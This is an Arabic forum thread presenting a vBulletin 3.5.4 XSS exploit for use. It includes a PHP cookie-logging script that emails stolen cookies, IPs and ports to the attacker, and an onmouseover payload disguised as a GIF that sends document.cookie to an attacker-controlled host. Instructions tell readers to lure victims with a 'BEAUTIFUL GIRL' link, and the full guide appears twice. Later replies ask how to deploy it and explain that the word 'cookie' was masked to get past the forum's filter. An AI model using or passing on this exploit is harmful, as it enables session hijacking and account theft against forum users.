السلام عليكم كيف الحال اخواني

هذي ثغره في vb 3.5.4

واتمنى احد الاعضاء العاصفه يشرحون لنا كيف تطبيق هذي الثغره


وهذي الوصله

http://www.security.nnov.ru/Ldocument956.html




السسمووووووووحه

قديمه


وفقط توقف المنتدى اعتقد يعني م اختراق بمعنى اختراق




سلام

الاستغلال :

ضع هذا الكود في ملف نصي وسميه اي اسم مثال mesa7eb.php لازم يكون بامتداد php لا تحفظه في تغيير لازم تسويه..

<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$****** = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>

ضع ايميلك هنا وقم بحفظ الكود ارفعه على اي موقع واحتفظ بمسار الملف :

$myemail = "YOUR ADDRESS E-MAIL";

ارفع الكود على اي موقع لايكوس فرضاَ او موقعك ان كنت تملك موقع المهم موقع يدعم الـ php ..

قم بوضع هذا الكود في ملف نصي وسميه image.gif لا تحفظه انتظر في تغيير لازم تسويه :

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >

قم بإستبدال هذا المسار بمسار الملف الي رفعته :

http://YOUR ADDRESS WEB.com/exploit.php

احفظه وارفعه واحتفظ بمسار الملف gif ..

الان ادخل على اي منتدى وانشئ موضوع جديد ضع فيه الكود التالي مع التغيير :

<a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '

اضغط على اضافة الموضوع ..

استبدل ******** بـ c o o k i e امسح المسافات بين الحروف ..

مشكور مسحب على التوضيح

الاستغلال :

ضع هذا الكود في ملف نصي وسميه اي اسم مثال mesa7eb.php لازم يكون بامتداد php لا تحفظه في تغيير لازم تسويه..

<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$****** = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>

ضع ايميلك هنا وقم بحفظ الكود ارفعه على اي موقع واحتفظ بمسار الملف :

$myemail = "YOUR ADDRESS E-MAIL";

ارفع الكود على اي موقع لايكوس فرضاَ او موقعك ان كنت تملك موقع المهم موقع يدعم الـ php ..

قم بوضع هذا الكود في ملف نصي وسميه image.gif لا تحفظه انتظر في تغيير لازم تسويه :

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >

قم بإستبدال هذا المسار بمسار الملف الي رفعته :

http://YOUR ADDRESS WEB.com/exploit.php

احفظه وارفعه واحتفظ بمسار الملف gif ..

الان ادخل على اي منتدى وانشئ موضوع جديد ضع فيه الكود التالي مع التغيير :

<a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '

اضغط على اضافة الموضوع ..

استبدل ******** بـ c o o k i e امسح المسافات بين الحروف ..




أنا وجدت صعوبة في شرحك

هل تستطيع توضيح أكثر ؟

قم بإستبدال هذا المسار بمسار الملف الي رفعته :

http://YOUR ADDRESS WEB.com/exploit.php

احفظه وارفعه واحتفظ بمسار الملف gif ..


هذه الخطوة لم أفهم عليك










استبدل ******** بـ c o o k i e امسح المسافات بين الحروف ..


من أين نستبدل ؟

تسلم يمينك يا مسحب

بس هذى النقطة لما افهمها

استبدل ******** بـ c o o k i e امسح المسافات بين الحروف

وشكرا يالذيب

مشكووووورين اخواني ع المرور واشكر اخوي MeSa7eB

و اخوي محمد الهاشمي على الشرح الوافي يعطيككم الف عافيه

تسلم ما قصرت

تسلم يمينك يا مسحب

بس هذى النقطة لما افهمها



وشكرا يالذيب
بسم الله الرحمن الرحيم
السلام عليكم
اخي العزيز الاخ يقصد
الكلمة c o o k i e s
في بين ال c و ال o وباقي الكلمات سبيس انت وخرهم لان لو حطيتها في المنتدى مربوطه هذا ممنوع لان بعض الاعضاء يستخدموها افي الاختراق
سلاااااام

تسلم اخي على الشرح الواف

الله عليك MeSa7eB شرح روعة بس يؤال صغير جدا

انت بتقول بدل **** نحطكلمو ******s ولا نحط الكوكيز نفسها ولو هانحط كوكيز نجيبها منين

شكرا

الف شكر اخواتي السنافي2 و MeSa7eB


تحياتي

الشرح صعب نريد توضيح أكثر

يا اخوان كلمه كوكي ما تقدر تكتبها بالانجليزي في الممنتدي
ف الاخ مسحب ما يقدر يكتبها علشان كده كتب

اضغط على اضافة الموضوع ..

استبدل ******** بـ c o o k i e امسح المسافات بين الحروف ..

******
وشكرا

اخر نقطه لم افهمها وهي عند عمل موضوع جديد في الموقع المراد سرقه الكوكيز

اقتح موضوع جديد واضع هذا الكود
<a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
لاكن اذا وضعته هكذا في الموضوع فانه مكشوف هل طريقتي صحيحه ام ماذا ارجو توضيح هذه النقطه

وهل يمكنني ان اضعه كتوقيع بدون فتح موضوع جديد

ياريت عاوزين توضيح من البداية